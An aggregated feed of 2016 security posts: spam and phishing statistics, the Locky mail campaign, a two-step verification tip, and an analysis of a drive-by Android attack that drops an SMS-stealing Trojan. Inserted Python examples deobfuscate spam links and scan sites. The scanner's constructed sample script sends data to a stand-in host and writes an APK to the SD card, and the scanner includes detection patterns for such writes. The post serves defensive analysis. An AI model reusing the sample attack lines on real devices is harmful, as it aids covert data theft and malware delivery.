Particular attention should be paid to emails containing Trojan downloaders that download the Locky encryptor. The attackers exploited a variety of file types to infect victim computers: at first they used .doc files with malicious macros, then JS scripts. In order to bypass filtering, the attackers made every malicious file within a single mass mailing unique. In addition, the emails had different content and were written in different languages. This doesn’t come as much of a surprise as attacks utilizing this encryptor were registered by KSN in 114 countries around the world.

Examples of emails with the Locky encryptor

The content of the emails was related to financial documents and prompted users to open the attachment.

If the attack was successful, Locky encrypted files with specific extensions (office documents, multimedia content, etc.) on the user’s computer, and displayed a message with a link leading to a site on the Tor network containing the cybercriminals’ demands. This process was analyzed in more detail in our blog.

As Locky is not always contained directly in the message, we cannot estimate its share in the volume of other malicious mail. However, the scripts that download and run Locky (detected by Kaspersky Lab as Trojan-Downloader.MSWord.Agent, Trojan-Downloader.JS.Agent, HEUR:Trojan-Downloader.Script.Generic) accounted for more than 50% of all malicious programs in email traffic.

Spam terrorism

Today terrorism is one of the most widely discussed topics both in the media and when political leaders meet. Frequent terrorist attacks in Europe and Asia have become a major threat to the world community, and the theme of terrorism is widely used by cybercriminals to mislead users.

In order to prevent terrorist attacks, security measures in many countries have been enhanced, and malicious spammers have been quick to take advantage. They tried to convince recipients of mass mailings that a file attached in an email contained information that would help a mobile phone owner detect an explosive device moments before it was about to detonate. The email claimed the technology came from the US Department of Defense, was easy to use and widely available. The attachment, in the form of an executable EXE file, was detected as Trojan-Dropper.Win32.Dapato – a Trojan that is used to steal personal information, organize DDoS attacks, install other malware, etc.

‘Nigerian’ scammers also got in on the act, exploiting the theme of terrorism to try and concoct credible stories. The senders introduced themselves as employees of a non-existent FBI division involved in the investigation of terrorism and financial crime. Their story revolved around the need for the recipient to contact the sender in order to resolve issues that are preventing the payment of a large sum of money. Among the reasons given for the delay in transferring the money the scammers cited a lack of confirmation that the money was legal and rightfully belonged to the recipient, or it was claimed third parties were trying to pocket the recipient’s money.

Nigerian letters also told stories of money – some of which was offered to the recipient – that had been obtained legally and was not related to drugs, terrorism or other crime. This was an attempt to dispel any doubts about their honesty and persuade recipients to reply.

The theme of terrorism came up again in tales related to the current situation in the Middle East. For example, some emails were sent on behalf of US soldiers who were fighting against terrorism in Afghanistan and were looking for an intermediary to save and invest money for them. Yet another author claimed that he had not joined ISIS or any another terrorist organization, but as a Muslim he wanted to donate a large sum of money for good deeds. A mistrust of charities meant the “Muslim” wanted to transfer the money to the recipient of the email. Yet another story was written on behalf of an American businessman who had lost half his business in Syria and Iraq because of the war and terrorism, and was looking for a partner to help him invest the remaining money.

Nigerian letters describing the tense situation in Syria also remained popular and were actively used by scammers to trick users.

We also came across advertising spam from Chinese factories offering all sorts of devices to ensure public security (for example, special devices for detecting explosives) and other anti-terrorist products.

Also trending: significant increase in volume of ‘Nigerian’ spam

It seems so-called Nigerian spammers have also felt the effects of the economic crisis, because they have recently increased their activity. In Q1 2016 we observed a significant increase in the volume of this type of mailing. In the past, the scammers encouraged recipients to respond to an email by telling a long detailed story that often contained links to articles in the mainstream media; now they send out short messages with no details, just a request to get in touch. Sometimes the email may mention a large sum of money that will be discussed in further correspondence, but there is no information about where it came from.

Perhaps the scammers believe that those who are already aware of the classic ‘Nigerian’ tricks will fall for these types of messages; or maybe they think that such short messages will be more suited for busy people who have no time to read long emails from strangers.

Spammer methods and tricks: short URL services and obfuscation

In our spam and phishing report for 2015 we wrote about obfuscation of domains. In Q1 2016, spammers continued this trend and even added some new tricks to their arsenal.

Cybercriminals continued to use short URL services, although the methods for adding “noise” to them have changed.

First of all, spammers began inserting characters – slashes, letters and dots – between the domain of a short URL service and the final link.

Both the link which the user follows and the link to the uploaded image in the email are obfuscated:

In addition to letters and dots, spammers even inserted random comment tags between slashes, and the browser continued to correctly interpret the links:

Note that the subject of the email contains the name Edward; it is also included in the comment tag used to add “noise”. In other words, the name is taken from one database while the “noise” tag is unique for each email in the mass mailing.

Russian-language spam also used obfuscation and short URL services, but the algorithm was different.

For example, to obfuscate links the @ symbol was used. To recap, the @ symbol is intended for user authentication on the site (it is actually no longer used). If the site does not require authentication, everything that precedes the @ symbol will simply be ignored. It means that in the email above, the browser will first open the site where it will execute the subquery ‘url =’ and then go to the URL specified, which belongs to a short URL service.

The link in this emails was also obfuscated with the @ symbol. Noise was also added by additional subqueries including the user’s email address, which made it unique for each email in the mass mailing.
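The tricks described above can be undone mechanically. As an added example (Python, not code from the report), the following resolves a link the way a browser does: it strips injected comment tags, separates the decoy text placed before “@” from the host that is really contacted, and follows a “url=”-style parameter to the short URL service behind it. The shortener list and the redirect parameter names are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed list of short URL services to flag; extend it for real use.
SHORTENERS = {"bit.ly", "goo.gl", "tinyurl.com", "short.example"}

# Query parameters that may carry a follow-on destination. The post shows
# 'url=' used this way; the other names are assumptions.
REDIRECT_PARAMS = ("url", "u", "redirect", "goto", "target")

COMMENT_TAG = re.compile(r"<!--.*?-->", re.DOTALL)


def strip_comment_noise(url: str) -> str:
    """Remove HTML comment tags injected into a link.

    The post reports that browsers still resolved links padded this way, so a
    mail filter must remove the padding before it can compare hosts.
    """
    return COMMENT_TAG.sub("", url)


def reveal_destination(url: str, depth: int = 3) -> dict:
    """Return the host the browser will really contact plus the decoy data.

    Anything before '@' in the authority part is userinfo; when the site does
    not ask for credentials it is ignored, so spammers put a trustworthy-looking
    name there. A redirect-style query parameter is followed up to `depth` hops
    so the short URL service (or other host) at the end is surfaced.
    """
    clean = strip_comment_noise(url.strip())
    parts = urlsplit(clean)
    host = (parts.hostname or "").lower()
    result = {
        "input": url,
        "host": host,
        "decoy": parts.username,  # text placed before '@', if any
        "shortener": host in SHORTENERS,
        "redirect_to": None,
    }
    if depth > 0:
        query = parse_qs(parts.query)
        for name in REDIRECT_PARAMS:
            for value in query.get(name, []):
                if value.startswith(("http://", "https://")):
                    result["redirect_to"] = reveal_destination(value, depth - 1)
                    return result
    return result


def suspicion_reasons(info: dict) -> list:
    """Collect the obfuscation tricks present anywhere along the chain."""
    reasons = []
    node = info
    while node is not None:
        if node["decoy"]:
            reasons.append("userinfo decoy '%s' before real host %s"
                           % (node["decoy"], node["host"]))
        if node["shortener"]:
            reasons.append("short URL service %s" % node["host"])
        if node["redirect_to"] is not None:
            reasons.append("redirect parameter on %s" % node["host"])
        node = node["redirect_to"]
    return reasons


if __name__ == "__main__":
    # Constructed sample links modelled on the tricks described in the post.
    samples = [
        "http://short.example/<!--Edward-->/a.b/c/xyz",
        "http://www.trusted-brand.test@redirect.example/"
        "?url=http://short.example/xyz&e=victim@mail.test",
    ]
    for sample in samples:
        print(sample)
        for reason in suspicion_reasons(reveal_destination(sample)):
            print("  -", reason)
```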

Statistics

Proportion of spam in email traffic

Percentage of spam in global email traffic, Q1 2016

The percentage of spam in overall global email traffic remained stable during the last few months of 2015. However, in January 2016 we registered a considerable increase in the share of unwanted correspondence – over 5.5 p.p. By February, however, the amount of spam in email traffic had dropped to its previous level. In March it grew again, though less dramatically. As a result, the average percentage of spam in Q1 2016 amounted to 56.92%.

Sources of spam by country

Sources of spam by country, Q1 2016

The US (12.43%) maintained its leadership, remaining the biggest source of spam in Q1 2016. Next came Vietnam (10.30%), India (6.19%) and Brazil (5.48%). China rounded off the Top 5, accounting for 5.09% of global spam.

Russia fell from last year’s second place to seventh (4.89%) in Q1 2016. It followed closely behind France (4.90%), which was the sixth biggest source of spam.

Spam email size

Spam email size distribution, Q4 2015 and Q1 2016

The most commonly distributed emails were very small – up to 2 KB (79.05%). The proportion of these emails grew by 2.7 p.p. from the previous quarter. The share of emails sized 20-50 KB also increased – from 3.02% to 7.67%. The amount of emails sized 2-5 KB, however, fell significantly compared to Q4 2015 – from 8.91% to 2.5%.

Malicious email attachments

Currently, the majority of malicious programs are detected proactively by automatic means, which makes it very difficult to gather statistics on specific malware modifications. So we have decided to turn to the more informative statistics of the Top 10 malware families.

Top 10 malware families

  1. Trojan-Downloader.JS.Agent. A typical representative of this family is an obfuscated JavaScript. Malware of this family uses ADODB.Stream technology, which allows it to download and run DLL, EXE and PDF files.

  2. Trojan-Downloader.VBS.Agent. This is a family of VBS scripts. As is the case with the JS.Agent family, ranked first, the representatives of this family use ADODB.Stream technology; however, they mainly download ZIP files, from which they extract and run other malicious software.

  3. Trojan-Downloader.MSWord.Agent. The representatives of this family are DOC files with an embedded macro written in Visual Basic for Applications (VBA) that runs when the document is opened. The macro downloads other malware from the cybercriminal’s site and launches it on the victim’s computer.

  4. Backdoor.Win32.Androm (Andromeda). This is a family of universal Andromeda/Gamarue modular bots. The key features of these bots include downloading, storing and launching malicious executable files; downloading and uploading a malicious DLL (without saving it to disk); updating and deleting themselves. The bot functionality is extended with plug-ins that can be loaded at any time.

  5. Trojan.Win32.Bayrob. The malicious programs of this Trojan family can download additional modules from the command server and run them, as well as work as a proxy server. They are used to distribute spam and steal personal data.

  6. Trojan-Downloader.JS.Cryptoload. A typical representative of this family is an obfuscated JavaScript. The malicious programs of this family download and run ransomware on the user’s computer.

  7. Trojan-PSW.Win32.Fareit. This malware family was designed to steal data such as credentials for FTP clients installed on an infected computer, credentials for cloud storage programs, cookie files in browsers and passwords for email accounts. The stolen information is sent to the criminals’ server. Some members of the Fareit family are capable of downloading and running other malware.

  8. Trojan.Win32.Agent. The malicious programs of this family destroy, block, modify or copy data or disrupt the operation of computers or computer networks.

  9. Trojan-Downloader.Win32.Upatre. The Trojans of this family do not exceed 3.5 KB, and their functions are limited to downloading payloads onto the infected computer – more often than not these are Trojan bankers known as Dyre/Dyzap/Dyreza. The main aim of this family of Trojan bankers is to steal payment data from users.

  10. Trojan-Spy.HTML.Fraud. The Trojans of this family consist of a fake HTML page sent via email that imitates an important notification from a major commercial bank, online store, software developer, etc. The user has to enter their personal data on this page, which is then forwarded to cybercriminals.

Countries targeted by malicious mailshots

There were some significant changes in the ranking of countries targeted most often by mailshots in Q1 2016.

Distribution of email antivirus verdicts by country, Q1 2016

Germany (18.93%) remained on top. China (9.43%), which ended 2015 in 14th place, unexpectedly came second. Brazil (7.35%) rounded off the Top 3.

Italy (6.65%) came fourth in the ranking, followed by the UK (4.81%). Russia was in sixth place with a share of 4.47%.

The US (3.95%), which had been in the Top 5 countries targeted by malicious mailshots for months on end, ended Q1 in eighth.


In Q1 2016, the Anti-Phishing system was triggered 34,983,315 times on the computers of Kaspersky Lab users.

Geography of attacks

The country where the largest percentage of users were affected by phishing attacks was once again Brazil (21.5%), with a 3.37 p.p. increase from the previous quarter. The share of those attacked in China (16.7%) and the UK (14.6%) also grew compared to Q4 2015 – by 4.4 p.p. and 3.68 p.p. respectively. Japan (13.8%), which was a leader in the previous year, saw its share fall by 3.18 p.p.

Geography of phishing attacks*, Q1 2016

* Number of users on whose computers the Anti-Phishing system was triggered as a percentage of the total number of Kaspersky Lab users in the country

Top 10 countries by percentage of users attacked:

  Brazil          21.5%
  China           16.7%
  United Kingdom  14.6%
  Japan           13.8%
  India           13.1%
  Australia       12.9%
  Bangladesh      12.4%
  Canada          12.4%
  Ecuador         12.2%
  Ireland         12.0%

Organizations under attack

The statistics on phishing targets are based on detections of Kaspersky Lab’s anti-phishing component. It is activated every time a user enters a phishing page when information about it is not yet included in Kaspersky Lab databases. It does not matter how the user enters the page – by clicking a link in a phishing email, in a message on a social network or as a result of malware activity. After the security system is activated, the user sees a banner in the browser warning about a potential threat.

Distribution of organizations affected by phishing attacks, by category, Q1 2016

In the first quarter of 2016, the ‘Global Internet portals’ category (28.69%) topped the rating of organizations attacked by phishers; its share increased by 0.39 p.p. from the previous quarter. Second and third places were occupied by two financial categories: ‘Banks’ (+4.81 p.p.) and ‘Payment systems’ (-0.33 p.p.). ‘Social networking sites’ (11.84%) and ‘Online games’ (8.40%) rounded off the Top 5, having lost 0.33 p.p. and 4.06 p.p. respectively.

Online stores

Attacks on online store users are interesting because they are often followed by the theft of bank card details and other personal information.

Distribution of online stores subject to phishing attacks, Q1 2016

Apple Store was the most popular online store with phishers. In the first quarter of 2016 its share in the ‘E-shop’ category accounted for 27.82%. Behind it in second place was another popular online store – Amazon (21.6%).

Example of a phishing page designed to steal Apple ID and bank card data

Steam (13.23%), a popular gaming service that distributes computer games and programs, rounded off the Top 3. It came 19th in the overall ranking of organizations affected by phishing attacks.

Links to phishing pages exploiting the theme of online games and gaming services are distributed via banners, posts on social networking sites, forums and, less frequently, via email.

Cybercriminal interest in Steam and gaming services in general is growing – gamers’ money and personal data are often targeted not only by phishers but also by software developers.

Top 3 organizations attacked

Fraudsters continue to focus the greatest part of their non-spear phishing attacks on the most popular companies. These companies have lots of customers around the world which enhances the chances of a successful phishing attack.

The Top 3 organizations attacked most often by phishers accounted for 21.71% of all phishing links detected in Q1 2016.

     Organization   % of detected phishing links
  1  Yahoo!         8.51
  2  Microsoft      7.49
  3  Facebook       5.71

In Q1 2016, the leading three organizations targeted by phishers saw a few changes. Yahoo! remained top (+1.45 p.p.). Microsoft (+2.47 p.p.) came second, followed by Facebook (-2.02 p.p.).

Interestingly, phishing on Facebook is delivered in almost all languages.

Facebook is also popular with cybercriminals as a means of spreading malicious content. We wrote about one such scheme in a recent blog.


In the first quarter of 2016 the percentage of spam in email traffic increased by 2.7 percentage points compared with the previous quarter. But it is too early to speak about a growth trend. The proportion of spam grows significantly at the beginning of every year because the amount of normal email decreases over the holiday period.

The US remained the biggest source of spam in Q1 2016. The Top 5 also included Vietnam, India, Brazil and China – all large, fast developing countries with high levels of internet connection.

Spam messages are becoming shorter. In the first quarter, the proportion of emails up to 2 KB exceeded 80% of all spam.

Q1 2016 saw the amount of spam containing malicious attachments increase dramatically. The share of malicious attachments in mail reached a peak in March – four times greater than last year’s average. This rapid growth was caused, specifically, by the popularity of crypto-ransomware, which was either contained in emails or downloaded to computers via a Trojan downloader.

This growth confirms our long-term forecasts on the gradual criminalization of spam that makes it even more dangerous, as well as reducing the overall share of email traffic. The diversity of languages, social engineering, lots of different types of attachments, text changing within a single mass mailing – all this takes spam to a new level of danger. Moreover, these malicious mass mailings have broad geographical coverage. The picture of malware distribution by email has changed significantly this year. In particular, China came an unexpected second in the ranking of countries targeted by malicious mailshots.

Another factor confirming the trend of increasingly criminalized spam is the growth of fraudulent, namely ‘Nigerian’, spam in the first quarter of 2016.

It is unlikely that the amount of malicious spam will continue to grow so rapidly: the more cybercriminals distribute malicious spam, the more people get to know of its dangers and the more careful they become about opening suspicious attachments. Therefore, such attacks will gradually fade away after a few months. However, there is the risk they may be replaced by other, even more complex attacks.

Two-Step Verification

SANS Tip of the Day - Thu, 05/12/2016 - 01:00
Two-step verification is one of the best steps you can take to secure any account. Two-step verification is when you require both a password and a code sent to or generated by your mobile device. Examples of services that support two-step verification include Gmail, Dropbox and Twitter.

Results of PoC Publishing

Malware Alerts - Wed, 05/11/2016 - 07:01

Dreams of a Threat Actor

There are two crucial features of the Android OS protection system:

  1. it is impossible to download a file without the user’s knowledge on a clean device;
  2. it is impossible to initiate the installation of a third-party app without the user’s knowledge on a clean device.

These approaches greatly complicate malware writers’ lives: to infect a mobile device, they have to resort to ruses of social engineering. The victim is literally tricked into force-installing a Trojan. This is definitely not always possible, as users become more aware, and it is not that easy to trick them.

Invisible installation of a malware app onto a mobile device without a user’s knowledge is definitely a daydream of many a malware writer. To do that, it is necessary to find and exploit an Android system vulnerability. These vulnerabilities have been found: we are talking about CVE-2012-6636, CVE-2013-4710, and CVE-2014-1939.

These vulnerabilities allow arbitrary code to be executed on a device by means of a custom-made HTML page containing JavaScript code. The vulnerabilities have been closed starting with Android 4.1.2.

It would be great to say that everything is fine now, but, alas, that is not so. We should not forget about the third feature of the Android OS: a device manufacturer is responsible for creating and deploying updates for its specific device model.

Updating the Android operating system is decentralized: each company uses its own custom version of Android, compiled with its own compilers and supplied with its own optimization and drivers. Regardless of who has found a vulnerability and whether that person has informed the OS developer about it, releasing updates is a prerogative of each manufacturer. Only manufacturers are capable of helping the users.

Nevertheless, updates are released somewhat periodically but mostly for the leading models: not all of the manufacturers actively support all of their models.

A publicly available detailed description of vulnerabilities in the Android OS provides malware writers with all of the required knowledge. Incidentally, a device vulnerable to these exploits can remain so for a long period of time: let us call it “an endless 0-day”. The problem can be solved only by buying a new device.

This, in particular, coupled with publicly available descriptions of the vulnerabilities and examples of them being exploited, incited malware writers into developing an exploit and performing drive-by attacks on mobile devices.

Web Site Infection

Drive-by attacks on computers of unsuspecting users give a large audience to threat actors (if they manage to post a malicious code on popular web sites) as well as invisibility (inasmuch as users do not suspect being infected). Owners of compromised web sites may not suspect being infected for a long time as well.

The method of code placement and other attack features make it possible to distinguish web sites infected with the same “infection”. For quite a long time, we observed a typical infection within a group of at least several dozen Russian web sites of different types and audience sizes, including quite well-known and popular resources (for example, web sites with daily audiences of 25,000 and 115,000 users). Web-site infection in this group is characterized by the use of the same intermediate domains, the similarity of the malicious code placed on them, the method of code placement (in most cases, it is placed on the same domain as a separate JavaScript file), as well as the speed and synchronicity of changes in the code on all of the infected web sites after the malicious code has been detected.

The attack method has been standard (even though it has gone through some changes), and it has been used at least since 2014. It has also been standard in that it targeted Windows OS users. However, some time ago, after the threat actors performed a regular modification of the code on infected web sites, we discovered a new script in place of the “common” one that loads Flash exploits. It checked for “Android 4” in the User-Agent header and operated with tools uncommon for Windows. This anomaly urged us to study the functionality of the script meticulously and watch the infection more closely.

Thus, on the 22nd of January 2016, we discovered a JavaScript code that exploited an Android vulnerability. Only three days later, on the 25th of January 2016, we found a new modification of this script with more threatening features.


We managed to detect two main script modifications.

Script 1: Sending SMS

The only goal of the first script is to send an SMS message to a phone number of threat actors with the word “test”. For that, the malware writers took advantage of the Android Debug Bridge (ADB) client that exists on all of the devices. The script executes a command to check for the ADB version on a device using the Android Debug Bridge Daemon (ADBD). The result of the command execution is sent to the server of the threat actors.

The code for sending an SMS is commented out, so in fact it cannot be executed. However, if it were uncommented, devices with Android versions below 4.2.2 could execute the commands given by the malware writers. In newer versions of Android, a local ADBD connection (in loopback mode) is forbidden on the device.

Sending an SMS to a regular number does not promise big losses for the victim, but nothing prevents the malware writers from replacing the test number with a premium-rate number.

The first malicious script modification should not cause any big problems for users, even if the threat actors were able to send an SMS to a short code. Most mobile carriers have the Advice-of-Charge feature, which does not apply any charges for the first SMS to a premium-rate number: one more message with a specific text must be sent. This is impossible to do from within JavaScript code in this specific case. This is most likely why a second modification of the script appeared.

Script 2: SD-Card File

The second script, in effect, is a dropper. It drops a malicious file from itself onto an SD card.

Part of the script body is decrypted using unsophisticated instructions. First of all, separators are removed from the string:

Then, the string is recorded onto an SD card into the MNAS.APK file:

The string must be executed. As a result, the created app should be installed onto the system:

However, this code is still commented out.

Let us review the script in more detail. The script has a check for a specific Android version (it has to be 4).

Obviously, the malware writers know which versions are vulnerable, and they are not trying to run the script on Android 5 or 6.

Just like with the first script, the second has an ADB check at the control center side:

In this case, the check will not affect anything; however, the ADB version is really essential, since not all of the versions support a local connection with ADBD.

We analyzed several modifications of the second script, which allowed us to track the flow of thought of the malware writers. Apparently, their main goal was to deliver the APK file to the victim.

Thus, some earlier script modifications send data about each executed command to the control center:

In this case, the SD card is checked for the MNAS.lock file. If it is not there, the script tries to create a zero-size MNAS.APK file using the touch utility.

In later script modifications, the task of delivering the APK file to the victim was solved by using the ECHO command, which makes it possible to create a file with arbitrary content on the device:

As a result of the ECHO command execution, a malicious APK file is created on the SD card.
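Site owners can check their own pages for the traits this post describes: the code arriving as a separate JavaScript file on the site’s own domain, references to the same intermediate domains, a “User-Agent contains Android 4” gate, an ADB version check, and MNAS.APK / MNAS.lock being written to the SD card with echo or touch. The following is an added example in Python, not tooling from the report; the sample page, the script bodies, the indicator weights and the flagging threshold are constructed assumptions.

```python
import re
from html.parser import HTMLParser

# Indicators taken from the post's description of the injected scripts.
# Weights and the flagging threshold are assumptions made for this example.
INDICATORS = [
    ("ua_android4", re.compile(r"userAgent[^;\n]{0,80}Android\s*4", re.I), 3),
    ("adb_reference", re.compile(r"(?<![a-z])adbd?(?![a-z])", re.I), 2),
    ("sdcard_file_write",
     re.compile(r"\b(echo|touch)\b[^\n]{0,120}/sdcard[^\n]{0,60}\.(apk|lock)", re.I), 4),
    ("mnas_artifacts", re.compile(r"MNAS\.(APK|lock)", re.I), 3),
]
FLAG_THRESHOLD = 5
URL_HOST = re.compile(r"https?://([A-Za-z0-9.\-]+)")


class ScriptCollector(HTMLParser):
    """Collect external script sources and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


def assess_script(src, js, site_host):
    """Score one script body and list the third-party hosts it refers to."""
    hits, score = {}, 0
    for name, rx, weight in INDICATORS:
        count = len(rx.findall(js))
        if count:
            hits[name] = count
            score += weight
    # Hosts other than the site itself are candidate intermediate domains.
    contacts = sorted({h.lower() for h in URL_HOST.findall(js)
                       if h.lower() != site_host.lower()})
    return {"src": src, "score": score, "hits": hits, "contacts": contacts,
            "flagged": score >= FLAG_THRESHOLD}


def scan_site(site_host, html, script_bodies):
    """Assess every script on a page. `script_bodies` maps each external
    script src to its text as fetched by the operator (constructed here)."""
    collector = ScriptCollector()
    collector.feed(html)
    collector.close()
    findings = [assess_script(src, script_bodies[src], site_host)
                for src in collector.external if src in script_bodies]
    findings += [assess_script("(inline)", js, site_host) for js in collector.inline]
    return findings


# Constructed sample: a site whose own counter script has been replaced by a
# stand-in carrying only the strings the post describes; it has no payload.
SITE_HOST = "news.example"
SAMPLE_HTML = """<html><head><title>constructed sample</title>
<script src="/js/jquery.min.js"></script>
<script src="/js/counter.js"></script>
</head><body><p>article text</p></body></html>"""
SAMPLE_SCRIPTS = {
    "/js/jquery.min.js": "/* library code */ function noop() {}",
    "/js/counter.js": (
        "if (navigator.userAgent.indexOf('Android 4') > -1) {\n"
        "  report('http://stat.intermediate.example/?v=' + adb_version);\n"
        "  run('echo <PLACEHOLDER> > /sdcard/MNAS.APK');\n"
        "}\n"
    ),
}

if __name__ == "__main__":
    for finding in scan_site(SITE_HOST, SAMPLE_HTML, SAMPLE_SCRIPTS):
        mark = "FLAG" if finding["flagged"] else " ok "
        print(mark, finding["src"], finding["score"], finding["hits"], finding["contacts"])
```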


The second script, in the state as we have discovered it, created and wrote a malicious file, which also needed to be executed, onto an SD card. Inasmuch as the dropper script does not contain a Trojan execution mechanism, the task has to be fulfilled by the user.

The APK file dropped from the script can be detected by Kaspersky Lab as Trojan-Spy.AndroidOS.SmsThief.ay. Since the beginning of 2016, we have managed to find four modifications of the Trojan.

Malware writers use the “” name inside the Trojan code:

At the same time, the malicious file has enough privileges to carry out full-fledged attacks on the victim's wallet by sending SMS messages:

The first thing the malicious code does after launch is request device administrator rights. After obtaining them, it hides itself from the application list, making it harder to detect and remove:

The Trojan waits for incoming SMS messages. If they match given rules, for example, if they come from the number of one of the largest Russian banks, the messages are immediately forwarded to the malware writers by SMS:

The intercepted messages are also forwarded to the threat actors' server:

Besides the control server, the threat actors use a control number to communicate with the Trojan: the data exchange takes place over SMS.

The control number is initially hard-coded in the malicious code:

The Trojan awaits specific commands from the control server and from the control number via SMS.

A command to change the control number can arrive from the threat actors' server:

The following commands can come from a control number:

  • SEND: send an SMS with the specified text to the specified number;
  • STOP: stop forwarding SMS messages;
  • START: start forwarding SMS messages.

For now, the Trojan's functionality is limited to intercepting and sending SMS messages.


A mass attack on mobile users is achieved by infecting a popular web resource with malicious code capable of executing any command from the threat actors on an infected device. In the attacks described in this article, the emphasis was on the devices of Russian users (notably, Russian domains were infected), and those devices are old and not up to date.

It is unlikely that malware writers' interest in drive-by attacks on mobile devices will wane; they will keep looking for ways to carry them out.

It is clear that malware writers will pay ever closer attention to research publications on remote code execution vulnerabilities, and that attempts to mount attacks using mobile exploits will continue.

It is also clear that, however tempting it is to publish a 0-day vulnerability, it is worth refraining from showing detailed exploit examples (proofs of concept). Publishing such examples will most likely lead to someone turning them into fully functional malicious code.

There is good news for the owners of old devices: our Kaspersky Internet Security solution protects a device by tracking changes on the SD card in real time and removing malicious code as soon as it is written there. Our users are therefore protected against threats known to Kaspersky Lab that are delivered via drive-by download.

IT threat evolution in Q1 2016

Malware Alerts - Thu, 05/05/2016 - 06:57


Q1 figures
  • According to KSN data, Kaspersky Lab solutions detected and repelled 228,420,754 malicious attacks from online resources located in 195 countries all over the world.
  • 74,001,808 unique URLs were recognized as malicious by web antivirus components.
  • Kaspersky Lab’s web antivirus detected 18,610,281 unique malicious objects: scripts, exploits, executable files, etc.
  • There were 459,970 registered notifications about attempted malware infections that aim to steal money via online access to bank accounts.
  • Crypto ransomware attacks were blocked on 372,602 computers of unique users.
  • Kaspersky Lab’s file antivirus detected a total of 174,547,611 unique malicious and potentially unwanted objects.
  • Kaspersky Lab mobile security products detected:
    • 2,045,323 malicious installation packages;
    • 4,146 mobile banker Trojans;
    • 2,896 mobile ransomware Trojans.

2016 has only just got underway, but the first three months have already seen as many cybersecurity events as would, just a few years ago, have seemed normal for a whole year. The main underlying trends remained the same, while there was significant growth in traditional cybercrime, especially mobile threats and global ransomware epidemics.

Ransomware became the main theme of the quarter after knocking targeted attacks from the top of the threat rating. Unfortunately, this situation will continue to evolve, and those behind the extortion could well end up being named the "problem of the year".

Targeted attacks

BlackEnergy2/3

The BlackEnergy cyberattack on the Ukrainian energy sector was the most high-profile incident. Although it occurred at the end of last year, a fuller picture of what happened only appeared in the course of the subsequent analysis. Moreover, attempts by cybercriminals to arrange new attacks continued in 2016.

The attack was unique because of the damage it caused: the hackers managed to disable the power distribution system in western Ukraine, launch a wiper program on the targeted systems and carry out a telephone DDoS on the technical support services of the affected companies.

There were numerous publications about the attack, and Kaspersky Lab’s experts revealed several aspects of the activities of the group responsible. In particular, they published an analysis of the tool used to penetrate the systems – a malicious DOC file.

For those who want to learn more about the attack, we recommend the report prepared by the American SANS Institute and ICS-CERT.


In February, the experts at Kaspersky Lab revealed details about the activities of Poseidon, the first Portuguese-speaking targeted attack group, which had set up a custom-tailored malware boutique.

Although the report was only released in 2016, the group has been operational for a long time. Malware campaigns that were most probably supported by Poseidon were detected as far back as 2005, while the first sample dates back to 2001. Poseidon’s arsenal is focused primarily on the Microsoft Windows operating system family: from Windows 95, which the group targeted in its early days, to Windows 8.1 and Windows Server 2012, which were targeted by the most recently detected malware samples.

The attack scenario is carefully tailored to the victim. Although the initial infection occurs according to the same scenario, the following stages of the campaign specifically customize the infection method for each new victim. That is why the specialists from the Global Research & Analysis Team (GReAT) decided to call Poseidon a “custom-tailored malware boutique”.

Having gained access to the corporate network, the criminals move across the network and collect as much data as possible in order to escalate their privileges, create a network map and to identify the computer they need. The main target of the attack is usually the local Windows domain controller. Once they have control over it, the attackers can steal intellectual property, data, trade secrets, and other valuable information.

The information collected by Poseidon for its owners was in most cases used to blackmail victim companies into contracting the Poseidon Group as a security firm. Regardless of whether a contract was signed, Poseidon remained on the network.

Hacking Team

Yet another infamous "boutique" creating cyber-espionage tools, the Italian company Hacking Team, fell victim to a cyberattack last year in which a huge archive of employee email correspondence was stolen, along with project source code.

The incident revealed a lot of problems in the company's work, and many thought it would be very difficult for the business to continue. However, at the beginning of 2016 new Hacking Team implants for OS X were found. This indicates that the group has no intention of halting its work and is continuing to develop tools for secondary operating systems. This means their "creations" will remain a problem for users who become an object of interest to HT customers.

Yet another story related to Hacking Team was the hunt for a Microsoft Silverlight 0-day. Information about the possible presence of this vulnerability was found in the Italian company’s documents. Based on very little initial data and armed with the Yara and VirusTotal tools, our experts set a trap and waited. And sure enough, they detected a 0-day exploit.


Kaspersky Lab was among the participants in Operation Blockbuster, a joint investigation conducted by several major IT security companies. The subject of the investigation was the activity of the Lazarus Group, a cybercriminal gang of supposedly North Korean origin that was involved in the attack on Sony Pictures in 2014.

The Lazarus Group has been around since 2009, but its activities moved up a gear from 2011. The group is responsible for such well-known attacks as Troy, Dark Seoul (Wiper) and WildPositron. During the investigation, more than 40 different types of malicious program the group had created over the years were identified. In particular, the group used its malware to attack companies, financial institutions, and radio and television broadcasters. Use of exploits for 0-day vulnerabilities was also recorded.

Hospitals under attack

This section on targeted attacks should also include Sergei Lozhkin’s research on how hackers can penetrate the internal network of hospitals and gain full access to patient data using publicly available tools and services.

Unfortunately, medical institutions are being targeted more and more by such attacks. In the first quarter of 2016, there were several incidents of hospital networks being infected with various types of Trojan ransomware that encrypts data and demands a ransom to decrypt it.

The latest incident was an attack on the MedStar network that affected 10 hospitals. According to the network's official statement, the data was recovered without paying a ransom to the blackmailers, while another hospital, in California, ended up paying $17,000 for a decryption key.

Cybercrime

Adwind

At the Security Analyst Summit 2016 (SAS 2016) our GReAT experts presented the results of their investigation into the Trojan known as Adwind RAT (Remote Access Tool). Having studied the activity of the malware, the researchers came to the conclusion that even the story behind the Trojan’s creation was out of the ordinary.

The Trojan was developed continuously over several years, with the first samples appearing in 2012. It has had different names at different times: in 2012, the creators were selling it as Frutas; in 2013 it was called Adwind; in 2014 the Trojan was known as Unrecom and AlienSpy; and in 2015 it was named JSocket.

The GReAT experts believe that Adwind and all its incarnations have been developed by one hard-working hacker who has been releasing new features and modules for four years.

The Adwind platform was initially only available in Spanish, but an English-language interface was added later, allowing cybercriminals worldwide to evaluate it. The main users of this Trojan are those conducting advanced cyber fraud, unscrupulous competitors, as well as so-called Internet mercenaries who are paid for spying on people and organizations online. Adwind can also be used by anyone wishing to spy on their friends.

